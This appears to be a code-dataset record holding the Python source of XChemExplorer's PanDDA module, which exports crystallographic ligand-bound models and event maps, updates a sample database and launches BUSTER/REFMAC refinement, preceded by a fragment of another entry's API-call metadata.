"(d['COLUMN_NAME'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((150, 14, 150, 58), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(150, 43, 150, 57): "d['DATA_TYPE']"}, {}), "(d['DATA_TYPE'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((154, 14, 154, 62), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(154, 43, 154, 61): "d['NUMERIC_SCALE']"}, {}), "(d['NUMERIC_SCALE'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((156, 16, 156, 65), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(156, 45, 156, 64): "d['COLUMN_DEFAULT']"}, {}), "(d['COLUMN_DEFAULT'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((157, 12, 157, 52), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(157, 41, 157, 51): "d['EXTRA']"}, {}), "(d['EXTRA'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((163, 17, 163, 63), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(163, 46, 163, 62): "d['IS_NULLABLE']"}, {}), "(d['IS_NULLABLE'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((164, 16, 164, 65), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(164, 45, 164, 64): "d['COLUMN_COMMENT']"}, {}), "(d['COLUMN_COMMENT'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((165, 16, 165, 69), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(165, 45, 165, 68): "d['CHARACTER_SET_NAME']"}, {}), "(d['CHARACTER_SET_NAME'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((166, 23, 166, 72), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(166, 52, 166, 71): "d['COLLATION_NAME']"}, {}), "(d['COLLATION_NAME'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((168, 19, 168, 
64), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(168, 48, 168, 63): "d['COLUMN_KEY']"}, {}), "(d['COLUMN_KEY'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((180, 14, 181, 157), 'echoscope.model.ds_model.FieldModel', 'ds_model.FieldModel', (), '', False, 'from echoscope.model import ds_model, config_model\n'), ((99, 20, 99, 65), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(99, 49, 99, 64): "d['TABLE_NAME']"}, {}), "(d['TABLE_NAME'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((100, 18, 100, 66), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(100, 47, 100, 65): "d['TABLE_COMMENT']"}, {}), "(d['TABLE_COMMENT'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((101, 25, 101, 75), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(101, 54, 101, 74): "d['TABLE_COLLATION']"}, {}), "(d['TABLE_COLLATION'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((102, 17, 102, 58), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(102, 46, 102, 57): "d['ENGINE']"}, {}), "(d['ENGINE'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((103, 16, 104, 90), 'echoscope.model.ds_model.TableModel', 'ds_model.TableModel', (), '', False, 'from echoscope.model import ds_model, config_model\n'), ((105, 8, 105, 57), 'logging.info', 'logging.info', ({(105, 21, 105, 56): "('load table:%s fields.' % tableName)"}, {}), "('load table:%s fields.' % tableName)", False, 'import logging\n'), ((152, 15, 153, 40), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(153, 10, 153, 39): "d['CHARACTER_MAXIMUM_LENGTH']"}, {}), "(d['CHARACTER_MAXIMUM_LENGTH'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n'), ((153, 87, 153, 139), 'echoscope.util.str_util.format_bytes_to_str', 'str_util.format_bytes_to_str', ({(153, 116, 153, 138): "d['NUMERIC_PRECISION']"}, {}), "(d['NUMERIC_PRECISION'])", False, 'from echoscope.util import mysql_util, str_util, log_util\n')] |
graeme-winter/XChemExplorer | lib/XChemPANDDA.py | 7b0779387705ab37074d80f77baf22891eb56907 | # last edited: 10/08/2017, 10:25
import os, sys, glob, subprocess
from datetime import datetime
from PyQt4 import QtGui, QtCore
import math
#from XChemUtils import mtztools
import XChemDB
import XChemRefine
import XChemUtils
import XChemLog
import XChemToolTips
import csv
try:
import gemmi
import pandas
except ImportError:
pass
#def get_names_of_current_clusters(xce_logfile,panddas_directory):
# Logfile=XChemLog.updateLog(xce_logfile)
# Logfile.insert('parsing {0!s}/cluster_analysis'.format(panddas_directory))
# os.chdir('{0!s}/cluster_analysis'.format(panddas_directory))
# cluster_dict={}
# for out_dir in sorted(glob.glob('*')):
# if os.path.isdir(out_dir):
# cluster_dict[out_dir]=[]
# found_first_pdb=False
# for folder in glob.glob(os.path.join(out_dir,'pdbs','*')):
# xtal=folder[folder.rfind('/')+1:]
# if not found_first_pdb:
# if os.path.isfile(os.path.join(panddas_directory,'cluster_analysis',out_dir,'pdbs',xtal,xtal+'.pdb') ):
# cluster_dict[out_dir].append(os.path.join(panddas_directory,'cluster_analysis',out_dir,'pdbs',xtal,xtal+'.pdb'))
# found_first_pdb=True
# cluster_dict[out_dir].append(xtal)
# return cluster_dict
class export_and_refine_ligand_bound_models(QtCore.QThread):
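    # exports all ligand-bound PanDDA models (*-pandda-model.pdb) together with their
    # event maps (converted to MTZ and cut around the ligand) into the project directory,
    # updates the database and starts an initial BUSTER refinement for every model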
def __init__(self,PanDDA_directory,datasource,project_directory,xce_logfile,which_models):
QtCore.QThread.__init__(self)
self.PanDDA_directory = PanDDA_directory
self.datasource = datasource
self.db = XChemDB.data_source(self.datasource)
self.Logfile = XChemLog.updateLog(xce_logfile)
self.xce_logfile = xce_logfile
self.project_directory = project_directory
self.which_models=which_models
self.external_software=XChemUtils.external_software(xce_logfile).check()
# self.initial_model_directory=initial_model_directory
# self.db.create_missing_columns()
# self.db_list=self.db.get_empty_db_dict()
# self.external_software=XChemUtils.external_software(xce_logfile).check()
# self.xce_logfile=xce_logfile
# self.already_exported_models=[]
def run(self):
self.Logfile.warning(XChemToolTips.pandda_export_ligand_bound_models_only_disclaimer())
# find all folders with *-pandda-model.pdb
modelsDict = self.find_modeled_structures_and_timestamps()
# if only NEW models shall be exported, check timestamps
if not self.which_models.startswith('all'):
modelsDict = self.find_new_models(modelsDict)
# find pandda_inspect_events.csv and read in as pandas dataframe
inspect_csv = None
if os.path.isfile(os.path.join(self.PanDDA_directory,'analyses','pandda_inspect_events.csv')):
inspect_csv = pandas.read_csv(os.path.join(self.PanDDA_directory,'analyses','pandda_inspect_events.csv'))
progress = 0
try:
            progress_step = 1 / float(len(modelsDict))
        except (TypeError, ZeroDivisionError):
self.Logfile.error('DID NOT FIND ANY MODELS TO EXPORT')
return None
for xtal in sorted(modelsDict):
os.chdir(os.path.join(self.PanDDA_directory,'processed_datasets',xtal))
pandda_model = os.path.join('modelled_structures',xtal + '-pandda-model.pdb')
pdb = gemmi.read_structure(pandda_model)
# find out ligand event map relationship
ligandDict = XChemUtils.pdbtools_gemmi(pandda_model).center_of_mass_ligand_dict('LIG')
if ligandDict == {}:
self.Logfile.error(xtal + ': cannot find ligand of type LIG; skipping...')
continue
self.show_ligands_in_model(xtal,ligandDict)
emapLigandDict = self.find_ligands_matching_event_map(inspect_csv,xtal,ligandDict)
            self.Logfile.warning('emapLigandDict: ' + str(emapLigandDict))
# convert event map to SF
self.event_map_to_sf(pdb.resolution,emapLigandDict)
# move existing event maps in project directory to old folder
self.move_old_event_to_backup_folder(xtal)
# copy event MTZ to project directory
self.copy_event_mtz_to_project_directory(xtal)
# copy pandda-model to project directory
self.copy_pandda_model_to_project_directory(xtal)
# make map from MTZ and cut around ligand
self.make_and_cut_map(xtal,emapLigandDict)
# update database
self.update_database(xtal,modelsDict)
# refine models
self.refine_exported_model(xtal)
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
def update_database(self,xtal,modelsDict):
db_dict = {}
timestamp_file = modelsDict[xtal]
db_dict['DatePanDDAModelCreated'] = timestamp_file
db_dict['RefinementOutcome'] = '3 - In Refinement'
self.Logfile.insert('updating database for '+xtal+' setting time model was created to '+db_dict['DatePanDDAModelCreated'])
self.db.update_data_source(xtal,db_dict)
def make_and_cut_map(self,xtal,emapLigandDict):
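        # convert the event MTZ of each matched ligand back into a map (FWT/PHWT),
        # cut it to a region of 7A around the ligand PDB and link the result
        # as <xtal>_<ligID>_event_cut.ccp4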
self.Logfile.insert('changing directory to ' + os.path.join(self.project_directory,xtal))
os.chdir(os.path.join(self.project_directory,xtal))
XChemUtils.pdbtools_gemmi(xtal + '-pandda-model.pdb').save_ligands_to_pdb('LIG')
for ligID in emapLigandDict:
m = emapLigandDict[ligID]
emtz = m.replace('.ccp4','_' + ligID + '.mtz')
emap = m.replace('.ccp4','_' + ligID + '.ccp4')
XChemUtils.maptools().calculate_map(emtz,'FWT','PHWT')
XChemUtils.maptools().cut_map_around_ligand(emap,ligID+'.pdb','7')
if os.path.isfile(emap.replace('.ccp4','_mapmask.ccp4')):
os.system('/bin/mv %s %s_%s_event.ccp4' %(emap.replace('.ccp4','_mapmask.ccp4'),xtal,ligID))
os.system('ln -s %s_%s_event.ccp4 %s_%s_event_cut.ccp4' %(xtal,ligID,xtal,ligID))
def copy_pandda_model_to_project_directory(self,xtal):
os.chdir(os.path.join(self.project_directory,xtal))
model = os.path.join(self.PanDDA_directory,'processed_datasets',xtal,'modelled_structures',xtal+'-pandda-model.pdb')
self.Logfile.insert('copying %s to project directory' %model)
os.system('/bin/cp %s .' %model)
def copy_event_mtz_to_project_directory(self,xtal):
self.Logfile.insert('changing directory to ' + os.path.join(self.PanDDA_directory,'processed_datasets',xtal))
os.chdir(os.path.join(self.PanDDA_directory,'processed_datasets',xtal))
for emap in glob.glob('*-BDC_*.mtz'):
self.Logfile.insert('copying %s to %s...' %(emap,os.path.join(self.project_directory,xtal)))
os.system('/bin/cp %s %s' %(emap,os.path.join(self.project_directory,xtal)))
def move_old_event_to_backup_folder(self,xtal):
self.Logfile.insert('changing directory to ' + os.path.join(self.project_directory,xtal))
os.chdir(os.path.join(self.project_directory,xtal))
if not os.path.isdir('event_map_backup'):
os.mkdir('event_map_backup')
self.Logfile.insert('moving existing event maps to event_map_backup')
for emap in glob.glob('*-BDC_*.ccp4'):
os.system('/bin/mv %s event_map_backup/%s' %(emap,emap+'.'+str(datetime.now()).replace(' ','_').replace(':','-')))
def show_ligands_in_model(self,xtal,ligandDict):
self.Logfile.insert(xtal + ': found the following ligands...')
for lig in ligandDict:
self.Logfile.insert(lig + ' -> coordinates ' + str(ligandDict[lig]))
def find_modeled_structures_and_timestamps(self):
self.Logfile.insert('finding out modelled structures in ' + self.PanDDA_directory)
modelsDict={}
for model in sorted(glob.glob(os.path.join(self.PanDDA_directory,'processed_datasets','*','modelled_structures','*-pandda-model.pdb'))):
sample=model[model.rfind('/')+1:].replace('-pandda-model.pdb','')
timestamp=datetime.fromtimestamp(os.path.getmtime(model)).strftime('%Y-%m-%d %H:%M:%S')
self.Logfile.insert(sample+'-pandda-model.pdb was created on '+str(timestamp))
modelsDict[sample]=timestamp
return modelsDict
def find_new_models(self,modelsDict):
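        # compare the file timestamp of every pandda model with DatePanDDAModelCreated in
        # the database; only models that are new or changed since the last export are returned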
samples_to_export = {}
        self.Logfile.hint('XCE will never export/refine models that are "5-deposition ready" or "6-deposited"')
self.Logfile.hint('Please change the RefinementOutcome flag in the Refinement table if you wish to re-export them')
self.Logfile.insert('checking timestamps of models in database...')
for xtal in modelsDict:
timestamp_file = modelsDict[xtal]
db_query=self.db.execute_statement("select DatePanDDAModelCreated from mainTable where CrystalName is '"+xtal+"' and (RefinementOutcome like '3%' or RefinementOutcome like '4%')")
try:
timestamp_db=str(db_query[0][0])
except IndexError:
self.Logfile.warning('%s: database query gave no results for DatePanDDAModelCreated; skipping...' %xtal)
self.Logfile.warning('%s: this might be a brand new model; will continue with export!' %xtal)
samples_to_export[xtal]=timestamp_file
timestamp_db = "2100-01-01 00:00:00" # some time in the future...
try:
difference=(datetime.strptime(timestamp_file,'%Y-%m-%d %H:%M:%S') - datetime.strptime(timestamp_db,'%Y-%m-%d %H:%M:%S') )
if difference.seconds != 0:
self.Logfile.insert('exporting '+xtal+' -> was already refined, but newer PanDDA model available')
samples_to_export[xtal]=timestamp_file
else:
self.Logfile.insert('%s: model has not changed since it was created on %s' %(xtal,timestamp_db))
except (ValueError, IndexError), e:
self.Logfile.error(str(e))
return samples_to_export
def event_map_to_sf(self,resolution,emapLigandDict):
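        # convert every matched event map (CCP4 format) into structure factors with gemmi
        # and rename the resulting MTZ file so that it carries the respective ligand ID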
for lig in emapLigandDict:
emap = emapLigandDict[lig]
emtz = emap.replace('.ccp4','.mtz')
emtz_ligand = emap.replace('.ccp4','_' + lig + '.mtz')
self.Logfile.insert('trying to convert %s to SF -> %s' %(emap,emtz_ligand))
self.Logfile.insert('>>> ' + emtz)
XChemUtils.maptools_gemmi(emap).map_to_sf(resolution)
if os.path.isfile(emtz):
os.system('/bin/mv %s %s' %(emtz,emtz_ligand))
self.Logfile.insert('success; %s exists' %emtz_ligand)
else:
self.Logfile.warning('something went wrong; %s could not be created...' %emtz_ligand)
def find_ligands_matching_event_map(self,inspect_csv,xtal,ligandDict):
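        # match every PanDDA event (x,y,z from pandda_inspect_events.csv) of this crystal
        # to the modelled ligand that lies within 7A of the event position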
emapLigandDict = {}
for index, row in inspect_csv.iterrows():
if row['dtag'] == xtal:
for emap in glob.glob('*-BDC_*.ccp4'):
self.Logfile.insert('checking if event and ligand are within 7A of each other')
x = float(row['x'])
y = float(row['y'])
z = float(row['z'])
matching_ligand = self.calculate_distance_to_ligands(ligandDict,x,y,z)
if matching_ligand is not None:
emapLigandDict[matching_ligand] = emap
self.Logfile.insert('found matching ligand (%s) for %s' %(matching_ligand,emap))
break
else:
self.Logfile.warning('current ligand not close to event...')
if emapLigandDict == {}:
self.Logfile.error('could not find ligands within 7A of PanDDA events')
return emapLigandDict
def calculate_distance_to_ligands(self,ligandDict,x,y,z):
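        # return the first ligand whose centre of mass lies within 7A of the event
        # position; distances are calculated with gemmi.Position.dist()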
matching_ligand = None
p_event = gemmi.Position(x, y, z)
for ligand in ligandDict:
c = ligandDict[ligand]
p_ligand = gemmi.Position(c[0], c[1], c[2])
self.Logfile.insert('coordinates ligand: ' + str(c[0])+' '+ str(c[1])+' '+str(c[2]))
self.Logfile.insert('coordinates event: ' + str(x)+' '+ str(y)+' '+str(z))
distance = p_event.dist(p_ligand)
self.Logfile.insert('distance between ligand and event: %s A' %str(distance))
if distance < 7:
matching_ligand = ligand
break
return matching_ligand
def refine_exported_model(self,xtal):
RefmacParams={ 'HKLIN': '', 'HKLOUT': '',
'XYZIN': '', 'XYZOUT': '',
'LIBIN': '', 'LIBOUT': '',
'TLSIN': '', 'TLSOUT': '',
'TLSADD': '',
'NCYCLES': '10',
'MATRIX_WEIGHT': 'AUTO',
'BREF': ' bref ISOT\n',
'TLS': '',
'NCS': '',
'TWIN': '',
'WATER': '',
'LIGOCC': '',
'SANITY': '' }
if 'nocheck' in self.which_models:
RefmacParams['SANITY'] = 'off'
self.Logfile.insert('trying to refine ' + xtal + '...')
self.Logfile.insert('%s: getting compound code from database' %xtal)
query=self.db.execute_statement("select CompoundCode from mainTable where CrystalName='%s';" %xtal)
compoundID=str(query[0][0])
        self.Logfile.insert('%s: compound code = %s' %(xtal,compoundID))
if os.path.isfile(os.path.join(self.project_directory,xtal,xtal+'.free.mtz')):
if os.path.isfile(os.path.join(self.project_directory,xtal,xtal+'-pandda-model.pdb')):
                self.Logfile.insert('running initial refinement on PANDDA model of '+xtal)
Serial=XChemRefine.GetSerial(self.project_directory,xtal)
if not os.path.isdir(os.path.join(self.project_directory,xtal,'cootOut')):
os.mkdir(os.path.join(self.project_directory,xtal,'cootOut'))
# create folder for new refinement cycle
if os.path.isdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial))):
os.chdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial)))
else:
os.mkdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.chdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.system('/bin/cp %s in.pdb' %os.path.join(self.project_directory,xtal,xtal+'-pandda-model.pdb'))
Refine=XChemRefine.Refine(self.project_directory,xtal,compoundID,self.datasource)
Refine.RunBuster(str(Serial),RefmacParams,self.external_software,self.xce_logfile,None)
else:
self.Logfile.error('%s: cannot find %s-pandda-model.pdb; cannot start refinement...' %(xtal,xtal))
else:
self.Logfile.error('%s: cannot start refinement because %s.free.mtz is missing in %s' % (
xtal, xtal, os.path.join(self.project_directory, xtal)))
class refine_bound_state_with_buster(QtCore.QThread):
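    # exports new or updated PanDDA models and their event maps into the project
    # directory and refines the bound state with BUSTER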
def __init__(self,panddas_directory,datasource,initial_model_directory,xce_logfile,which_models):
QtCore.QThread.__init__(self)
self.panddas_directory=panddas_directory
self.datasource=datasource
self.initial_model_directory=initial_model_directory
self.db=XChemDB.data_source(self.datasource)
self.db.create_missing_columns()
self.db_list=self.db.get_empty_db_dict()
self.external_software=XChemUtils.external_software(xce_logfile).check()
self.xce_logfile=xce_logfile
self.Logfile=XChemLog.updateLog(xce_logfile)
self.which_models=which_models
self.already_exported_models=[]
def run(self):
samples_to_export=self.export_models()
self.refine_exported_models(samples_to_export)
def refine_exported_models(self,samples_to_export):
self.Logfile.insert('will try to refine the following crystals:')
for xtal in sorted(samples_to_export):
self.Logfile.insert(xtal)
for xtal in sorted(samples_to_export):
self.Logfile.insert('%s: getting compound code from database' %xtal)
query=self.db.execute_statement("select CompoundCode from mainTable where CrystalName='%s';" %xtal)
compoundID=str(query[0][0])
            self.Logfile.insert('%s: compound code = %s' %(xtal,compoundID))
# compoundID=str(item[1])
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'.free.mtz')):
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'-pandda-model.pdb')):
                    self.Logfile.insert('running initial refinement on PANDDA model of '+xtal)
Serial=XChemRefine.GetSerial(self.initial_model_directory,xtal)
#######################################################
if not os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut')):
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut'))
# create folder for new refinement cycle
if os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial))):
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
else:
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.system('/bin/cp %s in.pdb' %os.path.join(self.initial_model_directory,xtal,xtal+'-pandda-model.pdb'))
Refine=XChemRefine.Refine(self.initial_model_directory,xtal,compoundID,self.datasource)
Refine.RunBuster(str(Serial),self.external_software,self.xce_logfile,None)
else:
self.Logfile.error('%s: cannot find %s-pandda-model.pdb; cannot start refinement...' %(xtal,xtal))
elif xtal in samples_to_export and not os.path.isfile(
os.path.join(self.initial_model_directory, xtal, xtal + '.free.mtz')):
self.Logfile.error('%s: cannot start refinement because %s.free.mtz is missing in %s' % (
xtal, xtal, os.path.join(self.initial_model_directory, xtal)))
else:
self.Logfile.insert('%s: nothing to refine' % (xtal))
def export_models(self):
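        # models are exported either unconditionally (which_models == 'all') or only if
        # their file timestamp differs from DatePanDDAModelCreated in the database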
self.Logfile.insert('finding out which PanDDA models need to be exported')
# first find which samples are in interesting datasets and have a model
# and determine the timestamp
fileModelsDict={}
queryModels=''
for model in glob.glob(os.path.join(self.panddas_directory,'processed_datasets','*','modelled_structures','*-pandda-model.pdb')):
sample=model[model.rfind('/')+1:].replace('-pandda-model.pdb','')
timestamp=datetime.fromtimestamp(os.path.getmtime(model)).strftime('%Y-%m-%d %H:%M:%S')
self.Logfile.insert(sample+'-pandda-model.pdb was created on '+str(timestamp))
queryModels+="'"+sample+"',"
fileModelsDict[sample]=timestamp
# now get these models from the database and compare the datestamps
# Note: only get the models that underwent some form of refinement,
# because only if the model was updated in pandda.inspect will it be exported and refined
dbModelsDict={}
if queryModels != '':
dbEntries=self.db.execute_statement("select CrystalName,DatePanDDAModelCreated from mainTable where CrystalName in ("+queryModels[:-1]+") and (RefinementOutcome like '3%' or RefinementOutcome like '4%' or RefinementOutcome like '5%')")
for item in dbEntries:
xtal=str(item[0])
timestamp=str(item[1])
dbModelsDict[xtal]=timestamp
self.Logfile.insert('PanDDA model for '+xtal+' is in database and was created on '+str(timestamp))
# compare timestamps and only export the ones where the timestamp of the file is newer than the one in the DB
samples_to_export={}
self.Logfile.insert('checking which PanDDA models were newly created or updated')
if self.which_models=='all':
            self.Logfile.insert('Note: you chose to export ALL available PanDDA models!')
for sample in fileModelsDict:
if self.which_models=='all':
self.Logfile.insert('exporting '+sample)
samples_to_export[sample]=fileModelsDict[sample]
else:
if sample in dbModelsDict:
try:
difference=(datetime.strptime(fileModelsDict[sample],'%Y-%m-%d %H:%M:%S') - datetime.strptime(dbModelsDict[sample],'%Y-%m-%d %H:%M:%S') )
if difference.seconds != 0:
self.Logfile.insert('exporting '+sample+' -> was already refined, but newer PanDDA model available')
samples_to_export[sample]=fileModelsDict[sample]
except ValueError:
# this will be raised if timestamp is not properly formatted;
# which will usually be the case when respective field in database is blank
# these are hopefully legacy cases which are from before this extensive check was introduced (13/01/2017)
                        advice = ( 'The pandda model of '+sample+' was changed, but it was already refined! '
                                   'This is most likely because this was done with an older version of XCE. '
                                   'If you really want to export and refine this model, you need to open the database '
                                   'with DBbrowser (sqlitebrowser.org); then change the RefinementOutcome field '
                                   'of the respective sample to "2 - PANDDA model", save the database and repeat the export procedure.' )
self.Logfile.insert(advice)
else:
self.Logfile.insert('exporting '+sample+' -> first time to be exported and refined')
samples_to_export[sample]=fileModelsDict[sample]
# update the DB:
# set timestamp to current timestamp of file and set RefinementOutcome to '2-pandda...'
if samples_to_export != {}:
select_dir_string=''
            select_dir_string_new_pandda=' '
for sample in samples_to_export:
self.Logfile.insert('changing directory to ' + os.path.join(self.initial_model_directory,sample))
os.chdir(os.path.join(self.initial_model_directory,sample))
self.Logfile.insert(sample + ': copying ' + os.path.join(self.panddas_directory,'processed_datasets',sample,'modelled_structures',sample+'-pandda-model.pdb'))
os.system('/bin/cp %s .' %os.path.join(self.panddas_directory,'processed_datasets',sample,'modelled_structures',sample+'-pandda-model.pdb'))
db_dict= {'RefinementOutcome': '2 - PANDDA model', 'DatePanDDAModelCreated': samples_to_export[sample]}
for old_event_map in glob.glob('*-BDC_*.ccp4'):
if not os.path.isdir('old_event_maps'):
os.mkdir('old_event_maps')
self.Logfile.warning(sample + ': moving ' + old_event_map + ' to old_event_maps folder')
os.system('/bin/mv %s old_event_maps' %old_event_map)
for event_map in glob.glob(os.path.join(self.panddas_directory,'processed_datasets',sample,'*-BDC_*.ccp4')):
self.Logfile.insert(sample + ': copying ' + event_map)
os.system('/bin/cp %s .' %event_map)
select_dir_string+="select_dir={0!s} ".format(sample)
                select_dir_string_new_pandda+='{0!s} '.format(sample)
self.Logfile.insert('updating database for '+sample+' setting time model was created to '+db_dict['DatePanDDAModelCreated']+' and RefinementOutcome to '+db_dict['RefinementOutcome'])
self.db.update_data_source(sample,db_dict)
return samples_to_export
class run_pandda_export(QtCore.QThread):
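    # runs pandda.export for new, updated or user-selected models, imports the site and
    # event information into the datasource and starts an initial REFMAC refinement
    # of the exported ensemble models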
def __init__(self,panddas_directory,datasource,initial_model_directory,xce_logfile,update_datasource_only,which_models,pandda_params):
QtCore.QThread.__init__(self)
self.panddas_directory=panddas_directory
self.datasource=datasource
self.initial_model_directory=initial_model_directory
self.db=XChemDB.data_source(self.datasource)
self.db.create_missing_columns()
self.db_list=self.db.get_empty_db_dict()
self.external_software=XChemUtils.external_software(xce_logfile).check()
self.xce_logfile=xce_logfile
self.Logfile=XChemLog.updateLog(xce_logfile)
self.update_datasource_only=update_datasource_only
self.which_models=which_models
self.already_exported_models=[]
self.pandda_analyse_data_table = pandda_params['pandda_table']
self.RefmacParams={ 'HKLIN': '', 'HKLOUT': '',
'XYZIN': '', 'XYZOUT': '',
'LIBIN': '', 'LIBOUT': '',
'TLSIN': '', 'TLSOUT': '',
'TLSADD': '',
'NCYCLES': '10',
'MATRIX_WEIGHT': 'AUTO',
'BREF': ' bref ISOT\n',
'TLS': '',
'NCS': '',
'TWIN': '' }
def run(self):
# v1.3.8.2 - removed option to update database only
# if not self.update_datasource_only:
samples_to_export=self.export_models()
        self.import_samples_into_datasource(samples_to_export)
# if not self.update_datasource_only:
self.refine_exported_models(samples_to_export)
def refine_exported_models(self,samples_to_export):
self.Logfile.insert('will try to refine the following crystals:')
for xtal in samples_to_export: self.Logfile.insert(xtal)
# sample_list=self.db.execute_statement("select CrystalName,CompoundCode from mainTable where RefinementOutcome='2 - PANDDA model';")
# for item in sample_list:
# xtal=str(item[0])
for xtal in sorted(samples_to_export):
self.Logfile.insert('%s: getting compound code from database' %xtal)
query=self.db.execute_statement("select CompoundCode from mainTable where CrystalName='%s';" %xtal)
compoundID=str(query[0][0])
            self.Logfile.insert('%s: compound code = %s' %(xtal,compoundID))
# compoundID=str(item[1])
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'.free.mtz')):
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'-ensemble-model.pdb')):
                    self.Logfile.insert('running initial refinement on PANDDA model of '+xtal)
Serial=XChemRefine.GetSerial(self.initial_model_directory,xtal)
#######################################################
if not os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut')):
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut'))
# create folder for new refinement cycle
if os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial))):
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
try:
os.system('/bin/rm *-ensemble-model.pdb *restraints*')
except:
self.Logfile.error("Restraint files didn't exist to remove. Will try to continue")
else:
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
Refine=XChemRefine.panddaRefine(self.initial_model_directory,xtal,compoundID,self.datasource)
os.symlink(os.path.join(self.initial_model_directory,xtal,xtal+'-ensemble-model.pdb'),xtal+'-ensemble-model.pdb')
Refine.RunQuickRefine(Serial,self.RefmacParams,self.external_software,self.xce_logfile,'pandda_refmac',None)
# elif xtal in os.path.join(self.panddas_directory,'processed_datasets',xtal,'modelled_structures',
# '{}-pandda-model.pdb'.format(xtal)):
# self.Logfile.insert('{}: cannot start refinement because {}'.format(xtal,xtal) +
# ' does not have a modelled structure. Check whether you expect this dataset to ' +
# ' have a modelled structure, compare pandda.inspect and datasource,'
# ' then tell XCHEMBB ')
else:
self.Logfile.error('%s: cannot find %s-ensemble-model.pdb; cannot start refinement...' %(xtal,xtal))
self.Logfile.error('Please check terminal window for any PanDDA related tracebacks')
elif xtal in samples_to_export and not os.path.isfile(
os.path.join(self.initial_model_directory, xtal, xtal + '.free.mtz')):
self.Logfile.error('%s: cannot start refinement because %s.free.mtz is missing in %s' % (
xtal, xtal, os.path.join(self.initial_model_directory, xtal)))
else:
self.Logfile.insert('%s: nothing to refine' % (xtal))
    def import_samples_into_datasource(self,samples_to_export):
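        # parse pandda_inspect_sites.csv and pandda_inspect_events.csv and write the
        # site/event information of all exported samples into the panddaTable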
# first make a note of all the datasets which were used in pandda directory
os.chdir(os.path.join(self.panddas_directory,'processed_datasets'))
for xtal in glob.glob('*'):
self.db.execute_statement("update mainTable set DimplePANDDAwasRun = 'True',DimplePANDDAreject = 'False',DimplePANDDApath='{0!s}' where CrystalName is '{1!s}'".format(self.panddas_directory, xtal))
# do the same as before, but look for rejected datasets
try:
os.chdir(os.path.join(self.panddas_directory,'rejected_datasets'))
for xtal in glob.glob('*'):
self.db.execute_statement("update mainTable set DimplePANDDAwasRun = 'True',DimplePANDDAreject = 'True',DimplePANDDApath='{0!s}',DimplePANDDAhit = 'False' where CrystalName is '{1!s}'".format(self.panddas_directory, xtal))
except OSError:
pass
site_list = []
pandda_hit_list=[]
with open(os.path.join(self.panddas_directory,'analyses','pandda_inspect_sites.csv'),'rb') as csv_import:
csv_dict = csv.DictReader(csv_import)
            self.Logfile.insert('reading pandda_inspect_sites.csv')
for i,line in enumerate(csv_dict):
self.Logfile.insert(str(line).replace('\n','').replace('\r',''))
site_index=line['site_idx']
name=line['Name'].replace("'","")
comment=line['Comment']
site_list.append([site_index,name,comment])
                self.Logfile.insert('add to site_list: ' + str([site_index,name,comment]))
progress_step=1
for i,line in enumerate(open(os.path.join(self.panddas_directory,'analyses','pandda_inspect_events.csv'))):
n_lines=i
if n_lines != 0:
progress_step=100/float(n_lines)
else:
progress_step=0
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
self.Logfile.insert('reading '+os.path.join(self.panddas_directory,'analyses','pandda_inspect_events.csv'))
